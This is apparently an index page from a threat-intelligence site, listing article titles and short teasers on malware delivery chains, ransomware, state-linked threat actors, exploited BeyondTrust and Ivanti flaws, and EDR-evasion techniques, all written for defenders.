Peaklight malware: Stealthy memory-resident delivery chain abusing LNK, mshta, CDN and WebDAV
Peaklight malware deep dive, peaklight, emmenhtal, in-memory malware, lnk, mshta, powershell, bunnycdn, webdav, cryptbot, lumma, shadowladder, hijackloader, threat hunting, incident response, mitre att&ck 1. Executive Summary Peaklight (also tracked as…
Payload Ransomware: Early Profile
Tags: Payload ransomware, data broker extortion, double extortion, Tor leak site, ESXi ransomware, RECOVERY-xx0001.txt, IOCs, incident response Published: 21 February 2026 (Europe/London) 1. Executive Summary Payload is an emerging ransomware…
APT33 – Threat Actor Profile
APT33, Elfin, Peach Sandstorm, HOLMIUM, Refined Kitten, Iran, aerospace, energy, petrochemical, spearphishing, password spraying, Outlook Home Page, Ruler, TurnedUp, DropShot, ShapeShift, StoneDrill 1. Executive Summary APT33 is a suspected Iranian…
BeyondTrust CVE-2026-1731: Pre-auth RCE escalates from rapid scanning to ransomware-linked intrusions
CISA has now flagged CVE-2026-1731—a critical, pre-authentication remote code execution flaw in BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) as being used in ransomware campaigns, signalling that exploitation…
Ivanti EPMM Pre-Auth RCE (CVE-2026-1281) Under Active Exploitation
Ivanti Endpoint Manager Mobile (EPMM) sits in a uniquely privileged position: it manages device enrollment, policy enforcement, and app/content distribution across entire mobile fleets. When an internet-facing EPMM server is…
EDR Killers in 2026: The most common ways attackers neutralize endpoint security — and how to stop them
Publish date: 21 February 2026Category: Threat Intelligence / Defense Evasion / Endpoint SecurityTags: EDR, XDR, ransomware, defense evasion, BYOVD, Windows drivers, tamper protection, detection engineering Executive summary “EDR killers” are…
BYOVD in 2026: the signed-driver loophole powering EDR bypass at scale
Last updated: 21 February 2026 (Europe/London) 1. Executive Summary Bring Your Own Vulnerable Driver (BYOVD) is a post-compromise technique where attackers load a legitimately signed (but vulnerable) kernel driver and…
APT29 (Cozy Bear / The Dukes / Midnight Blizzard) – Threat Actor Profile
APT29, also known as Cozy Bear, is a Russian hacker group believed to be affiliated with one or more Russian intelligence agencies. The group has been operating for the Russian…
APT28 (Fancy Bear / Sofacy / Sednit / Forest Blizzard) – Threat Actor Profile
1. Executive Summary APT28 is a long-running Russian state-aligned cyber espionage actor widely attributed to the GRU’s 85th Main Special Service Center (GTsSS), military unit 26165, active since at least…
APT31 (Violet Typhoon / ZIRCONIUM) – Threat Actor Profile
At-a-glance Attribute Assessment Primary tracking name APT31 (widely used in government and industry reporting) (Department of Justice) Notable aliases Violet Typhoon / ZIRCONIUM (Microsoft), JUDGMENT PANDA (CrowdStrike) (Microsoft Learn) Suspected…